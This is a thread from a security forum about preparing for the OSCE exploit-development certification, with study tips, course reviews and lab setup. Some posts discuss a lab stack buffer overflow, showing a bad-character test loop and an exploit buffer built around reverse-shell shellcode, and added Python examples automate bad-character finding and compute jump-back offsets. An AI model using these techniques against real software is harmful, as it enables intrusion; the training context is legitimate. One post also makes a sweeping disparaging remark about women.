
OSCE advice?

<<

dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Feb 06, 2013 9:56 pm

Re: OSCE advice?

DragonGorge wrote:Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

How'd it go BTW? Did you write a review?


Totally understandable; I was just teasing :)

I'm way behind on a lot of reviews I want to write. The next 4-6 weeks are insane for me, so it'll be a bit longer still. I'll definitely post a link here when I have a chance to get to it though.

Suffice to say, it was both the most challenging and rewarding cert I've done.



MaXe, how many shells do you have from all of us opening those Intern0t PDFs?
The day you stop learning is the day you start becoming obsolete.
<<

Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Wed Feb 06, 2013 11:20 pm

Re: OSCE advice?

ajohnson wrote:@DK: I assume you're not sending the shellcode because it doesn't make it there. Otherwise, that would be your first problem ;D

You haven't got all the bad characters out, and even after that, you're not jumping back far enough. You'll currently land in the middle of the shellcode once you correct the characters.

x = ''
# Build a string of all 256 byte values written as Python escape sequences
# ("\x00\x01...\xff"), so the output can be pasted straight into an exploit
# script as the test payload.
for i in range(0, 256):
   x += "\\x%02x" % i
print(x)

will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn't work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you're feeling ambitious. There's an example in the courseware.


I seem to be missing something as it relates to jumping back into the stack. Currently I am jumping back approx. 512 bytes. I tried jumping back further but then I jump out of my allocated buffer.

Any help as it relates to jumping back? That's where I am having the problem.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
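The bad-character procedure ajohnson describes above (send all 256 byte values, compare what arrives in memory with what was sent, drop the byte that broke the copy, repeat) as an added example; this is not code from the thread. The target is simulated by a constructed function that behaves like a C-string copy (truncates at 0x00) and then rewrites 0x0a to 0x0d, so the loop converges on those two bytes; the function names are my own.

```python
# Added example, not from the thread: automate the "send the 256-byte pattern,
# diff it against memory, strip a byte, resend" loop described in the post.

def all_bytes() -> bytes:
    """Every byte value 0x00..0xff in order: the classic bad-character probe."""
    return bytes(range(256))


def as_python_literal(data: bytes) -> str:
    """Render bytes the way the quoted loop prints them, e.g. '\\x00\\x01...'."""
    return "".join("\\x%02x" % b for b in data)


def compare_buffer(sent: bytes, observed: bytes) -> dict:
    """Diff the probe that was sent against the bytes found in memory.

    Reports the first offset where the copies diverge (a truncated copy counts as
    diverging at its end), the byte that was sent there, what was found instead
    (None if the copy was cut short), and the sent bytes absent from the copy.
    """
    n = min(len(sent), len(observed))
    first = next((i for i in range(n) if sent[i] != observed[i]), None)
    if first is None and len(observed) < len(sent):
        first = len(observed)
    return {
        "first_divergence": first,
        "sent_byte": None if first is None else sent[first],
        "observed_byte": None if first is None or first >= len(observed) else observed[first],
        "missing": sorted(set(sent) - set(observed)),
    }


def strip_bytes(pattern: bytes, bad: set) -> bytes:
    """The probe with the bytes already identified as bad removed."""
    return bytes(b for b in pattern if b not in bad)


def find_bad_chars(send_fn, max_rounds: int = 256) -> list:
    """Repeat the post's procedure: send the probe, diff, drop the first mangled
    byte, resend, until the copy in memory matches the probe exactly.

    send_fn(probe) stands in for "send the line and read the buffer back in the
    debugger"; it must return the bytes as they ended up in memory.
    """
    bad = set()
    for _ in range(max_rounds):
        probe = strip_bytes(all_bytes(), bad)
        diff = compare_buffer(probe, send_fn(probe))
        if diff["first_divergence"] is None:
            return sorted(bad)
        bad.add(diff["sent_byte"])
    raise RuntimeError("bad-character search did not converge")


def simulate_target_copy(data: bytes) -> bytes:
    """Constructed stand-in for the target: copies the input as a C string
    (stops at the first 0x00) and then translates line feeds to carriage returns."""
    cut = data.split(b"\x00", 1)[0]
    return cut.replace(b"\x0a", b"\x0d")


if __name__ == "__main__":
    first_round = compare_buffer(all_bytes(), simulate_target_copy(all_bytes()))
    print("round 1 diverged at offset", first_round["first_divergence"],
          "sent byte 0x%02x" % first_round["sent_byte"])
    bad = find_bad_chars(simulate_target_copy)
    print("bad characters:", ", ".join("0x%02x" % b for b in bad))
    print("clean probe starts:", as_python_literal(strip_bytes(all_bytes(), set(bad))[:4]))
```

Against a real target the `send_fn` is the only part that changes: it sends the probe and returns the bytes read from the buffer at the breakpoint ajohnson mentions (or via pydbg, as the courseware example does). Note that a truncated copy and a substituted byte are reported differently, which tells you whether the filter is a string terminator or a translation.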
<<

MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Thu Feb 07, 2013 12:03 am

Re: OSCE advice?

DragonGorge wrote:
ajohnson wrote:Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ;)

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.

Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

How'd it go BTW? Did you write a review?


No, but I did:
https://forum.intern0t.org/blogs/maxe/9 ... art-1.html

https://forum.intern0t.org/blogs/maxe/1 ... art-2.html
https://forum.intern0t.org/blogs/maxe/1 ... art-3.html
https://forum.intern0t.org/blogs/maxe/1 ... art-4.html

ajohnson wrote:

MaXe, how many shells do you have from all of us opening those Intern0t PDFs?


A couple of thousand people who appreciated reading them :-) I don't put bad stuff in my papers, code, PoCs, etc.
(Some of them may have very basic anti-script-kiddie measures, but it's as simple as finding the field where I wrote: you have to uncomment this line or the script won't work.)
I'm an InterN0T'er
<<

dynamik

Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Thu Feb 07, 2013 12:35 am

Re: OSCE advice?

Dark_Knight wrote:I seem to be missing something as it relates to jumping back into the stack. Currently I am jumping back approx. 512 bytes. I tried jumping back further but then I jump out of my allocated buffer.

Any help as it relates to jumping back? That's where I am having the problem.


I put a break point at the beginning of the piece that jumps back and then stepped through it. After it actually made the jump, I was in the middle of the shellcode I used after all the Bs. This is how I went about it with what you already had, so maybe we're going about it in a different manner?

Code:
expl = "\x41" * 1271 + "\x42" * (517-len(shell_reverse_tcp)) + shell_reverse_tcp + jmp_esp + "\x90" * 50 + jmp_back + "\x90" * 361


I'd just start your jmp_back code with a break point, step through it, and see where you end up. I'm also on a different SP as I had to change the jmp esp value, so maybe there are other variables in play. When in doubt, break and step.

MaXe wrote:A couple of thousand, people that appreciated reading them :-) I don't put bad stuff in my papers, code, pocs, etc.
(Some of them may have very basic anti script kiddie measures, but it's as simple as finding the field where I wrote: you have to uncomment this line or the script won't work.)


Yea, they're great. I definitely referred to the AV bypass one as I was going through the course.
The day you stop learning is the day you start becoming obsolete.
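To make the "where does the jump back land" question concrete, here is an added example (not from the thread) that turns the buffer layout dynamik posted into byte offsets and reports which segment a given backward displacement lands in. The shellcode size, the 4-byte `jmp_esp` address and the 5-byte near-jump size are assumptions the thread does not state; change them to match your own exploit.

```python
# Added example, not from the thread: model the posted layout
#   "A"*1271 + "B"*(517-len(shellcode)) + shellcode + jmp_esp + "\x90"*50 + jmp_back + "\x90"*361
# and compute where a relative backward jump lands.

SHELLCODE_LEN = 480   # assumption: size of an encoded reverse-shell payload
JMP_ESP_LEN = 4       # assumption: jmp_esp is a 4-byte return-address overwrite
JMP_BACK_LEN = 5      # assumption: a 5-byte near jmp (opcode plus rel32)


def layout(shellcode_len: int = SHELLCODE_LEN):
    """Segments of the posted buffer, in order, as (name, length)."""
    return [
        ("A padding", 1271),
        ("B padding", 517 - shellcode_len),
        ("shellcode", shellcode_len),
        ("jmp esp", JMP_ESP_LEN),
        ("nop sled", 50),
        ("jmp back", JMP_BACK_LEN),
        ("trailing nops", 361),
    ]


def offsets(segs) -> dict:
    """Map each segment name to its (start, end) byte offsets within the buffer."""
    out, pos = {}, 0
    for name, length in segs:
        out[name] = (pos, pos + length)
        pos += length
    return out


def segment_at(segs, offset: int):
    """Name of the segment containing the offset, or None if it is outside the buffer."""
    for name, (start, end) in offsets(segs).items():
        if start <= offset < end:
            return name
    return None


def landing(segs, displacement: int):
    """Where a backward relative jump of `displacement` bytes lands.

    A relative jump is taken from the address following the jump instruction
    (EIP already points past it), so the target is end_of_jmp_back - displacement.
    Returns (target_offset, segment_name_or_None).
    """
    _, jb_end = offsets(segs)["jmp back"]
    target = jb_end - displacement
    return target, segment_at(segs, target)


def needed_displacement(segs) -> int:
    """Displacement that lands exactly on the first shellcode byte."""
    sc_start = offsets(segs)["shellcode"][0]
    jb_end = offsets(segs)["jmp back"][1]
    return jb_end - sc_start


if __name__ == "__main__":
    segs = layout()
    for name, (start, end) in offsets(segs).items():
        print("%-14s %5d .. %5d" % (name, start, end))
    for disp in (512, needed_displacement(segs), 2000):
        target, where = landing(segs, disp)
        print("jump back %4d bytes -> offset %5d (%s)" % (disp, target, where or "outside buffer"))
```

With the assumed 480-byte shellcode the posted layout puts the first shellcode byte at offset 1308 and the end of `jmp_back` at 1847, so a 512-byte jump lands at offset 1335, 27 bytes into the shellcode, exactly the "middle of the shellcode" outcome described above, while the displacement that reaches the start is 539; anything larger than 1847 leaves the buffer entirely. Run it with your own shellcode length before stepping through in the debugger and the two should agree.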
<<

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Feb 07, 2013 10:30 am

Re: OSCE advice?

MaXe and ajohnson, you are both gold mines!!!

Now I have a ton of things to read and practice.  :)

BTW, do you guys know where I can get a WinXP VM that I can use in my lab? I am running an AMD64 Linux machine at home...

Thx
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

UNIX

Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Thu Feb 07, 2013 10:37 am

Re: OSCE advice?

<<

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Feb 07, 2013 11:36 am

Re: OSCE advice?


Great, thanks UNIX! You too (and many more here) are a gold mine!!  :D

I have also found this http://www.mydigitallife.info/how-to-convert-and-import-vhd-to-vmdk-vmware/ to convert these VHD to VMWare VMDK format.

Update: The last step: http://hacktolive.org/wiki/Using_VMware_images_%28.vmdk_files%29
Last edited by caissyd on Fri Feb 08, 2013 10:52 am, edited 1 time in total.
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

DragonGorge

Jr. Member

Posts: 86

Joined: Wed Feb 08, 2012 6:30 pm

Post Thu Feb 07, 2013 5:43 pm

Re: OSCE advice?


First off...I had to read the beginning of your review/blog twice...you took OSCE not having taken the OSCP?!?!  :o Whoa! I have to give you the Wayne's World "We're not worthy" bow.

Great review. One thing I noticed was that the writing in the beginning differed from the end which seemed much more frenetic - I attributed it to an abuse of Red Bull that Offsec seems to demand. Could also be all those exploded brain cells from the class/exam. :)

Also, noticed the line "I passed and nothing could ruin my mood. Ex was whining, angry customers, and heaps more bad stuff going on...." Earlier you wrote "my girlfriend understood me...." Couldn't help but wonder if the "ex" status was attributable to the OSCE. I know my SO was more than fed up by the end of the OSCP.

Again, great review.
<<

MaXe

Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Thu Feb 07, 2013 9:46 pm

Re: OSCE advice?

Indeed I did, DragonGorge, and it was also the first course and certification I had ever taken, plus I don't have any lengthy education or, for that matter, a long history of relevant business experience. (Of course, as I am a community guy, I've been in the hacking world for a long time.)

Yea, during the course and the certification it became increasingly harder, hence the reason the writing style changed to display my frustration  ;D
I'd say it's exploded brain cells, it was nice to be in several scenarios where you have to think outside the box and come up with clever solutions  :)

Well, in the beginning she said she understood I had to study most evenings, so I could be at her place at 10pm or so. After a couple of weeks the whining began, but during the actual exam I had specifically said no whining, as I would lose concentration completely; she respected that and I am glad she did.

Afterwards though, she began to whine again but that day when I got the email, nothing could as previously said, ruin my mood. Passing a certification is just a great feeling when it's been a long and hard journey.

The reason she became my ex was not related to OSCE, even though it could've been a cool story  ;D "The only certification that will make your wife or girlfriend leave you" xD (I broke up with her, as I realised I now had OSCE and didn't need a girlfriend, jk, it was for other personal reasons  ;D In short, she was bad for me (I know that most women complain about a lot of things (because it's socially accepted in most cultures), but this one was over level 9000), but it's the kind of bad that feels a little good hehe )

Thanks for the feedback / response, I enjoyed writing it :-)
I'm an InterN0T'er
<<

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Feb 07, 2013 11:32 pm

Re: OSCE advice?

@H1t M0nk3y

OSCE is hard. Best advice I can give looking back is to simply practice. I used to go to exploit db, pull down exploits, strip out all the stuff in the middle and start with a simple crash. From there, rebuild the exploit. If you do that 100 times, you're in good shape :)

The course material is merely supplemental to what's needed for the exam, assuming you have no experience prior. Go for it though, even if you fail, keep going because it's really really good stuff. You'll eventually get it.
<<

hayabusa

Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Fri Feb 08, 2013 9:07 am

Re: OSCE advice?

cd1zz wrote:@H1t M0nk3y

OSCE is hard. Best advice I can give looking back is to simply practice. I used to go to exploit db, pull down exploits, strip out all the stuff in the middle and start with a simple crash. From there, rebuild the exploit. If you do that 100 times, you're in good shape :)

The course material is merely supplemental to what's needed for the exam, assuming you have no experience prior. Go for it though, even if you fail, keep going because it's really really good stuff. You'll eventually get it.


Great advice, there. Sums it all up, nicely. Even IF you fail the first time (MOST but not all of us did), it opens your eyes, and you'll definitely nail it on a second go, because you'll be confident. But if you follow cd1zz, ajohnson and MaXe's advice, you'll do well.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

caissyd

Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Fri Feb 08, 2013 9:14 am

Re: OSCE advice?

Thank you all for this great advice.

I have a pretty good idea now about what to do for exploit development. But what about the web apps and the network sections? Any advice on these two topics?
Last edited by caissyd on Fri Feb 08, 2013 10:04 am, edited 1 time in total.
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

UNIX

Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Fri Feb 08, 2013 9:39 am

Re: OSCE advice?

The sections about web application and network security are rather short, as the focus of the CTP course lies within application security. Being a web developer, you already have a good background, so I'd just recommend playing around with some of the many available vulnerable VMs if you want some further practice. If you haven't already read it, I'd also recommend The Web Application Hacker's Handbook in order to get a good overview of the subject.

In terms of the network security section, you could look into something like GNS3.
<<

lepke

Newbie

Posts: 2

Joined: Tue Jul 09, 2013 9:53 am

Post Thu Jul 11, 2013 11:06 am

Re: OSCE advice?

It appears I am a little late to the party however, as an aspiring OSCE I just wanted to say thanks for the wealth of great information. I begin the course on 7/27, so this information will undoubtedly come in handy!
<<

superkojiman

Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Thu Jul 11, 2013 12:49 pm

Re: OSCE advice?

lepke wrote:It appears I am a little late to the party however, as an aspiring OSCE I just wanted to say thanks for the wealth of great information. I begin the course on 7/27, so this information will undoubtedly come in handy!


I just finished the course a couple of weeks ago and I'm waiting to take the exam now. You'll definitely have lots of fun. As with OSCP, be prepared to do your own research.
OSCP + OSCE